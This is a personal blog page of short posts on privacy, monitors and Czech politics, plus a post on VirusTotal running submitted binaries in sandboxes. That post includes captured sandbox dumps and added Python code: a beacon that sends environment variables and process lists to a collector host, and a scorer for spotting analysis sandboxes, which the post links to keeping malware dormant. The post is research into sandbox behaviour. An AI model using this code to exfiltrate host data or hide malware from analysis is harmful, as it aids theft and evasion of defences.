adawolfa

daily occasional dose of nihilism🌗

Password

This mother is demanding her kid’s Facebook password. The sub is full of weirdos, but I find this one unusually disturbing. Apart from a personal diary and your own mind, is there anything more private than anyone’s one-to-one conversation? Sure, you can discuss things in person, or you can make a phone call, but it’s 2019, it’s pretty common to use a messenger, I guess. What you think and talk about with your closest friends is kinda who you are. This is a direct attack on your own identity and personality.

It’s an easy problem to solve: you can just create and use a different channel from the one being monitored (which is, by the way, exactly what is going to happen in this particular case). In other words, mutual trust is lost and, worse, the claimed “protection” is now off the table, as there is a channel the parent doesn’t even know about. I wouldn’t count on the woman actually explaining to her child what online safety and privacy are and how (and why!) to keep them.

I mean, how is this different from listening to anyone else’s phone calls, reading their letters and stalking them? How do you actually do this without considering yourself a piece of shit?

Who can use Facebook: … For this reason, you must: Not share your password, give access to your Facebook account to others, or transfer your account to anyone else (without our permission).

facebook.com/legal/terms

Theoretically, this could even be a federal crime. At the end of the day, a password is a sort of property and as such it should be protected, no exceptions.

Finally got a 144 Hz screen. It’s definitely worth it, but why can’t we have a 23″ Full HD one? Being quite a fullscreen (maximized window) person, I’m pretty fine with that resolution (dual screen). The smallest I could find for a reasonable price was 27″. I mean, it’s acceptable, I don’t perceive individual pixels, but why?

Took me an hour to figure out why the hell the screen was running at 60 Hz in ET. I found out it was because I had r_colorBits set to 34. No idea why I would set it like that! Anyway, it’s awesome how smooth the game is. And even after switching to 76 FPS in order to reduce sniper recoil, the game is still playable (it’s still better than 125 FPS on a 60 Hz screen), no more jerky and broken frames. Also, scrolling in the browser is much smoother.

The only obvious downside here is that I will no longer be able to use a 60 Hz screen.

Today, dear children, we’ll tell a fairy tale about the robber Kolovratník from Babiš’s estate, who took from the poor and gave to the rich.

“The measure already introduced in the past, in the form of emission fees on the oldest vehicles, led to a radical reduction in their imports. Buyers simply started to prefer buying newer and cleaner cars. The state can simply continue this policy.”

And which reality do you live in?

VirusTotal sample execution

So today I read an interesting article about how a binary was automatically submitted to the Microsoft Defender online service for further analysis. It turns out that unknown binaries are sometimes uploaded and executed in a test environment on a machine with Internet access.

I made a simple C# application which dumps all environment variables and running processes and captures ipconfig output. The dump is then sent to my endpoint and stored in a database. For some reason I wasn’t able to trigger Microsoft Defender’s automatic sample submission, so I tried something different: I submitted the binary to virustotal.com.
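For reference, this is what such a beacon looks like as a small Python script. It is an added example, not the C# tool described above: it collects the same three things (environment, process list, ipconfig output) and POSTs them as JSON to a collector URL given on the command line. The database side is left out, the JSON layout and the collector URL are assumptions, and the ps/ip fallback is only there so the script can be tried on a non-Windows host.

```python
"""Beacon that reports the executing environment to a collector endpoint.

Added example, not the original C# tool. The collector URL is supplied by
the caller; the JSON layout below is this example's own assumption.
"""
import json
import os
import subprocess
import sys
import urllib.error
import urllib.request


def run(cmd, timeout=30):
    """Run a command and return its stdout; empty string if it is missing or fails."""
    try:
        done = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return done.stdout
    except (OSError, subprocess.SubprocessError):
        return ""


def collect():
    """Gather environment, process list and network config, like the original beacon."""
    if sys.platform == "win32":
        procs = run(["tasklist", "/FO", "CSV", "/NH"])
        ipcfg = run(["ipconfig"])
    else:
        # Assumption: POSIX fallback so the script can be exercised on a Linux box.
        procs = run(["ps", "-eo", "comm="])
        ipcfg = run(["ip", "addr"]) or run(["ifconfig", "-a"])
    return {
        "exe": os.path.abspath(sys.argv[0]),
        "env": dict(os.environ),
        "processes": [line.strip() for line in procs.splitlines() if line.strip()],
        "ipconfig": ipcfg,
    }


def send_report(url, report, timeout=10):
    """POST the report as JSON. Returns the HTTP status, or None if the network fails."""
    body = json.dumps(report).encode("utf-8")
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/json", "User-Agent": "beacon/0.1"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except (urllib.error.URLError, OSError):
        # An offline sandbox never reaches the collector; a sandbox with
        # Internet access, as seen later in the post, does.
        return None


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: beacon.py https://collector.example/report")  # hypothetical URL
    status = send_report(sys.argv[1], collect())
    print("reported" if status else "collector unreachable")
```

The report is sent with plain urllib so the compiled beacon has no dependencies; whether the POST ever arrives is exactly the signal the experiment is looking for.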

I immediately got a green result: no malware found. Interestingly, nothing was submitted to my API at that point. But a few minutes later, the application was executed somewhere!

Two responses came from the same address and, judging by the internal IP, also from the same computer.

IP: 66.102.8.227

Path: C:\Program Files (x86)\Windows Resource Kits\Tools\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\python27;C:\Users\John\AppData\Local\Microsoft\WindowsApps;;c:\python27\lib\site-packages\pywin32_system32
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: WIN-VUA6POUV5UP
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\John\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\John\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
TIX_LIBRARY: C:\Python27\tcl\tix8.4.3
TCL_LIBRARY: C:\Python27\tcl\tcl8.5
TMP: C:\Users\John\AppData\Local\Temp
TK_LIBRARY: C:\Python27\tcl\tk8.5
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\John
COMPUTERNAME: WIN-VUA6POUV5UP
USERPROFILE: C:\Users\John
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: John
NUMBER_OF_PROCESSORS: 1
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 45 Stepping 7, GenuineIntel
PYTHONPATH: c:\tools
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\WIN-VUA6POUV5UP
TEMP: C:\Users\John\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
USERDOMAIN_ROAMINGPROFILE: WIN-VUA6POUV5UP
PROCESSOR_REVISION: 2d07
SystemRoot: C:\Windows
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


c:\Users\John\Downloads\download.exe

Path: C:\Program Files (x86)\Windows Resource Kits\Tools\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\python27;C:\Users\John\AppData\Local\Microsoft\WindowsApps;;c:\python27\lib\site-packages\pywin32_system32
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: WIN-VUA6POUV5UP
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\John\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\John\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
TIX_LIBRARY: C:\Python27\tcl\tix8.4.3
TCL_LIBRARY: C:\Python27\tcl\tcl8.5
TMP: C:\Users\John\AppData\Local\Temp
TK_LIBRARY: C:\Python27\tcl\tk8.5
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\John
COMPUTERNAME: WIN-VUA6POUV5UP
USERPROFILE: C:\Users\John
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: John
NUMBER_OF_PROCESSORS: 1
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 45 Stepping 7, GenuineIntel
PYTHONPATH: c:\tools
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\WIN-VUA6POUV5UP
TEMP: C:\Users\John\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
USERDOMAIN_ROAMINGPROFILE: WIN-VUA6POUV5UP
PROCESSOR_REVISION: 2d07
SystemRoot: C:\Windows
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


c:\Users\John\Downloads\download.exe

svchost
svchost
svchost
svchost
splwow64
SearchUI
winlogon
conhost
svchost
dwm
svchost
sihost
svchost
c:\python27\python.exe
conhost
C:\Program Files\Meterpreter\metsvc.exe
c:\Users\John\Downloads\download.exe
lsass
smss
services
conhost
csrss
wininit
msdtc
C:\Windows\SysWoW64\cmd.exe
OSPPSVC
svchost
svchost
C:\Program Files\Meterpreter\metsvc-server.exe
svchost
csrss
WMIADAP
svchost
RuntimeBroker
svchost
explorer
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
ShellExperienceHost
WmiPrvSE
svchost
svchost
svchost
System
spoolsv
Idle


Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b587:5273:1adc:5eb3%5
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.2

This one came from a different address, and it was executed with administrator privileges.

IP: 54.39.189.18

Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\admin\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\admin\AppData\Local\Programs\Python\Python37\
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: USER-PC
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\admin\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\admin\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
windows_tracing_flags: 3
windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
TMP: C:\Users\admin\AppData\Local\Temp
USERPROFILE: C:\Users\admin
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
FP_NO_HOST_CHECK: NO
HOMEPATH: \Users\admin
COMPUTERNAME: USER-PC
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: admin
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 60 Stepping 1, GenuineIntel
SystemRoot: C:\Windows
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\USER-PC
TEMP: C:\Users\admin\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
PROCESSOR_REVISION: 3c01
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


C:\Users\admin\Downloads\DTR.Test.exe

Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\admin\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\admin\AppData\Local\Programs\Python\Python37\
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: USER-PC
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\admin\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\admin\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
windows_tracing_flags: 3
windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
TMP: C:\Users\admin\AppData\Local\Temp
USERPROFILE: C:\Users\admin
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
FP_NO_HOST_CHECK: NO
HOMEPATH: \Users\admin
COMPUTERNAME: USER-PC
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: admin
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 60 Stepping 1, GenuineIntel
SystemRoot: C:\Windows
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\USER-PC
TEMP: C:\Users\admin\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
PROCESSOR_REVISION: 3c01
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


C:\Users\admin\Downloads\DTR.Test.exe

dwm
winlogon
taskhost
taskhost
smss
csrss
conhost
svchost
SearchFilterHost
svchost
wmpnetwk
frida-winjector-helper-64
spoolsv
pythonw
lsm
svchost
svchost
svchost
explorer
lsass
C:\Users\admin\AppData\Local\Temp\frida-cce960e005f9cecbea94cf1ed62cd59b\frida-winjector-helper-32.exe
C:\Users\admin\AppData\Local\Temp\frida-cce960e005f9cecbea94cf1ed62cd59b\frida-winjector-helper-32.exe
csrss
conhost
svchost
svchost
services
sppsvc
audiodg
svchost
svchost
wininit
C:\Users\admin\Downloads\DTR.Test.exe
rundll32
svchost
SearchProtocolHost
WmiPrvSE
svchost
C:\Windows\pyw.exe
SearchIndexer
System
WmiPrvSE
WmiPrvSE
Idle


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : openstacklocal
   Link-local IPv6 Address . . . . . : fe80::4143:fe31:8593:6d6e%11
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.2

Tunnel adapter isatap.openstacklocal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : openstacklocal

It’s not surprising or particularly interesting, really. Just a recyclable, short-lived container.

However, VirusTotal executes your program only after it has already told the user it’s clean. And even if it didn’t, well, you could detect the environment, make the application interactive (waiting for a mouse move, or something else that only happens on a real computer) and only then download and execute the actual malicious code.
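The captures above are recognisable as analysis hosts at a glance, which is what makes the “detect the environment” step cheap. As an added example (not part of the original post), the following Python scores a beacon report like the ones above for sandbox indicators: the strong ones are the analyst’s own tooling (the Meterpreter service in the first host, the Frida injector in the second), the medium ones are the default user-mode NAT addressing and the OpenStack DNS suffix, and the weak ones are the single-digit CPU count and generic host and user names. The weights, the threshold, the list of generic user names and the “workstation” baseline record are this example’s assumptions; the two sandbox samples are trimmed from the captures reproduced above.

```python
"""Score a beacon report for analysis-sandbox indicators.

Added example; not part of the original post. Weights, the workstation
baseline and the generic-name list are this example's assumptions. The
two sandbox samples are trimmed from the captures reproduced above.
"""
import re

# Process base names (lower-case, without .exe) that only show up where someone
# is instrumenting the guest. Both families appear in the captures above.
INSTRUMENTATION = {
    "metsvc": "Meterpreter service",
    "metsvc-server": "Meterpreter service",
    "frida-winjector-helper-32": "Frida injector",
    "frida-winjector-helper-64": "Frida injector",
}
GENERIC_USERS = {"john", "admin", "user", "sandbox", "test"}  # assumption


def basename(proc):
    """'C:\\Program Files\\Meterpreter\\metsvc.exe' -> 'metsvc'."""
    name = proc.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    return name[:-4] if name.endswith(".exe") else name


def parse_ipconfig(text):
    """Extract the first IPv4 address, gateway and DNS suffix from Windows ipconfig output."""
    def grab(label):
        m = re.search(label + r"[ .]*:[ \t]*(\S*)", text)
        return m.group(1) if m else ""
    return {"ipv4": grab("IPv4 Address"),
            "gateway": grab("Default Gateway"),
            "dns_suffix": grab("Connection-specific DNS Suffix")}


def score_report(env, processes, ipconfig):
    """Return (score, hits); each hit is (weight, reason)."""
    env = {k.upper(): v for k, v in env.items()}  # Windows env names are case-insensitive
    net = parse_ipconfig(ipconfig)
    hits = []
    for name in sorted({basename(p) for p in processes} & set(INSTRUMENTATION)):
        hits.append((5, f"{INSTRUMENTATION[name]} running: {name}"))
    if net["ipv4"] == "10.0.2.15" and net["gateway"] == "10.0.2.2":
        hits.append((3, "default user-mode NAT addressing (VirtualBox/QEMU)"))
    if net["dns_suffix"].lower() == "openstacklocal":
        hits.append((3, "OpenStack DNS suffix: cloud-hosted guest"))
    if env.get("NUMBER_OF_PROCESSORS", "").strip() in {"1", "2"}:
        hits.append((1, env["NUMBER_OF_PROCESSORS"].strip() + " logical CPU(s)"))
    host = env.get("COMPUTERNAME", "")
    if re.fullmatch(r"WIN-[A-Z0-9]{11}", host) or host.upper() == "USER-PC":
        hits.append((2, "default-style host name " + host))
    if env.get("USERNAME", "").lower() in GENERIC_USERS:
        hits.append((1, "generic user name " + env["USERNAME"]))
    if env.get("WINDOWS_TRACING_LOGFILE", "").lower().startswith("c:\\bvtbin"):
        hits.append((1, "windows_tracing_logfile points into C:\\BVTBin (as in the second capture)"))
    return sum(w for w, _ in hits), hits


def looks_like_sandbox(env, processes, ipconfig, threshold=5):
    """True when the weighted evidence reaches `threshold` (an assumed cut-off)."""
    return score_report(env, processes, ipconfig)[0] >= threshold


# Constructed samples: trimmed from the two captures above, plus an assumed
# ordinary workstation as a baseline.
CAPTURE_A = dict(
    env={"COMPUTERNAME": "WIN-VUA6POUV5UP", "USERNAME": "John", "NUMBER_OF_PROCESSORS": "1"},
    processes=["svchost", "c:\\python27\\python.exe",
               "C:\\Program Files\\Meterpreter\\metsvc.exe",
               "C:\\Program Files\\Meterpreter\\metsvc-server.exe", "explorer"],
    ipconfig="Ethernet adapter Ethernet 2:\n\n"
             "   Connection-specific DNS Suffix  . : \n"
             "   IPv4 Address. . . . . . . . . . . : 10.0.2.15\n"
             "   Default Gateway . . . . . . . . . : 10.0.2.2\n",
)
CAPTURE_B = dict(
    env={"COMPUTERNAME": "USER-PC", "USERNAME": "admin", "NUMBER_OF_PROCESSORS": "2",
         "windows_tracing_logfile": "C:\\BVTBin\\Tests\\installpackage\\csilogfile.log"},
    processes=["frida-winjector-helper-64",
               "C:\\Users\\admin\\AppData\\Local\\Temp\\frida-cce960e005f9cecbea94cf1ed62cd59b\\frida-winjector-helper-32.exe",
               "explorer"],
    ipconfig="   Connection-specific DNS Suffix  . : openstacklocal\n"
             "   IPv4 Address. . . . . . . . . . . : 10.0.2.15\n"
             "   Default Gateway . . . . . . . . . : 10.0.2.2\n",
)
WORKSTATION = dict(  # assumed baseline, not from the page
    env={"COMPUTERNAME": "LAPTOP-ALICE", "USERNAME": "alice", "NUMBER_OF_PROCESSORS": "8"},
    processes=["svchost", "explorer", "chrome", "outlook"],
    ipconfig="   IPv4 Address. . . . . . . . . . . : 192.168.1.23\n"
             "   Default Gateway . . . . . . . . . : 192.168.1.1\n",
)

if __name__ == "__main__":
    for label, sample in [("A", CAPTURE_A), ("B", CAPTURE_B), ("workstation", WORKSTATION)]:
        score, hits = score_report(**sample)
        print(f"{label}: score {score}, sandbox={score >= 5}")
        for weight, reason in hits:
            print(f"  +{weight} {reason}")
```

The weighting matters: the cheap checks (CPU count, a WIN-xxxx host name) also fire on plenty of legitimate small VMs, so on their own they should never decide anything, while a running metsvc or Frida helper is decisive. A dropper that only goes live when the score is low, and only after a real user event, would sail past the execution seen in this experiment.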

Sure, VirusTotal has its uses, but can we say, in general, that a green-marked application is safe to run? No, we cannot. The only thing you can assume is that the binary itself doesn’t contain malicious code, or at least not any well-known malicious code.

Just don’t blindly trust VirusTotal, and think twice about what it actually does.

I recommend everyone take the unique opportunity to look into the soul of a prohibitionist, who shared with us the fresh topic “Auto je zbraň” (A car is a weapon). All sorts of ideas are being floated on how to deal with the piles of corpses along the roads: this year alone at least 380 people have died in traffic accidents! Mr. Skalický is evidently excited by safe-driving courses; he would also like it if a car with a more powerful engine required passing an exam and the gracious permission of an official. Driving a more powerful car should then be something everyone has to earn.